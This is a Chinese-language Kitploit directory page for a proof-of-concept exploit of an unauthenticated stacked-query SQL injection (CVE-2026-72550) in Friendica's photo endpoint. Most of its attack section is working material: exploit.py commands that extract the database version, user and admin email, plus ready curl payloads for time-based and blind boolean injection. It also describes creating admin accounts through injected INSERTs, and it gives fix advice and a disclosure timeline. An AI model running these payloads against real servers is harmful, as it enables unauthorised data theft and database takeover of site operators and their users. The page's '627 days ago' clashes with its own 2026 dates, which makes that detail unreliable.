Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-72550-poc — CVE-2026-72550 — Friendica 未认证堆叠查询 SQL 注入 PoC (CVSS 9.8 严重) | Kitploit
工具/GitHubGitHub/abdugafforov-bobur/cve-2026-72550-poc
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集Web安全渗透测试
GitHubabdugafforov-bobur/cve-2026-72550-poc

CVE-2026-72550-poc

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

CVE-2026-72550 — Friendica 未认证堆叠查询 SQL 注入 PoC (CVSS 9.8 严重)

查看仓库
627天前尚未审核
分享

CVE-2026-72550 — Friendica 未认证 SQL 注入

Friendica 照片端点中的未认证堆叠查询 SQL 注入允许任何访客执行任意 SQL。

字段值
CVE IDCVE-2026-72550
产品Friendica(自托管联合社交网络)
受影响版本<= 2026.08-dev (git HEAD e3fc1bc)
类型CWE-89:SQL 注入(未认证,堆叠查询)
严重性严重 — CVSS 3.1:9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
需要认证无

摘要

Friendica 的照片查看端点获取 order 查询参数,并将其未转义地拼接进 SHOW COLUMNS ... LIKE '...' 语句中,该语句通过直接调用 PDO::query() 执行——从而允许多条语句执行。无需登录,在默认安装(block_public 默认关闭)中,任何公开可见的照片都足以触发。由于 PDO::query() 会执行堆叠语句,匿名攻击者不仅能读取数据——还能执行任意 SQL,包括通过 INSERT/UPDATE 创建管理员用户。

漏洞代码路径

root@kitploit:~
mod/photos.php:673              — reads raw $_GET['order']
DBStructure::existsColumn()     — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
  src/Database/DBStructure.php:714
DBA::p() → PDO::query()         — executes with stacked statements enabled

默认请求路径即可到达此代码:$cmd 默认为 'view'(满足 $cmd === 'view' 检查),且 no_count 处于关闭状态,因此无需认证,也无需任何非默认设置。

使用方法

root@kitploit:~
# Install dependency
pip install requests

# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only

# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version

# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user

# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name

# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email

参数

选项描述
-u / --url目标基础 URL(例如 http://target:8176)
-r / --user要访问其照片画廊的用户名
-i / --resource-id任意公开可见照片的资源 ID
--extract要窃取的值:version、db_user、db_name、admin_email
--check-only仅测试漏洞,不窃取数据
--sleepSLEEP 延迟秒数(默认:5)

手动复现

无需 Cookie 或认证。将其指向任意公开照片的 resource-id:

root@kitploit:~
# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=created"

# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"

解码后的载荷:x';SELECT SLEEP(5)-- -

注入后的 SQL 变为:

root@kitploit:~
SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'

盲布尔提取

root@kitploit:~
# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"

# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"

影响

未认证攻击者可以:

  • 读取数据库中的任意数据(盲提取凭据、电子邮件、私信)
  • 写入任意行——包括通过 INSERT INTO user 创建管理员账户
  • 修改现有数据——将任意用户提升为管理员、篡改帖子、重置密码
  • 删除数据或删除表(拒绝服务)

在默认的 Friendica 安装中,任何匿名访客都可实现完整的数据库接管。

修复方案

  1. 在使用前根据已知列白名单验证 order
  2. 在 SHOW COLUMNS 中使用参数化查询,而非字符串拼接
  3. 在 PDO 连接上禁用多语句执行(PDO::ATTR_EMULATE_PREPARES => false)

时间线

日期事件
2026-07-07在本地实例上发现并确认漏洞
2026-08-11通过 TuranSec CNA 发布 CVE-2026-72550

免责声明

本工具仅用于授权的安全测试和教育目的。请仅对您拥有或已获得明确书面测试许可的系统使用。作者不对滥用行为承担任何责任。

致谢

由 Bobur Abdugafforov(@abdugafforov-bobur)发现

CVE 由 TuranSec CNA 分配

下载工具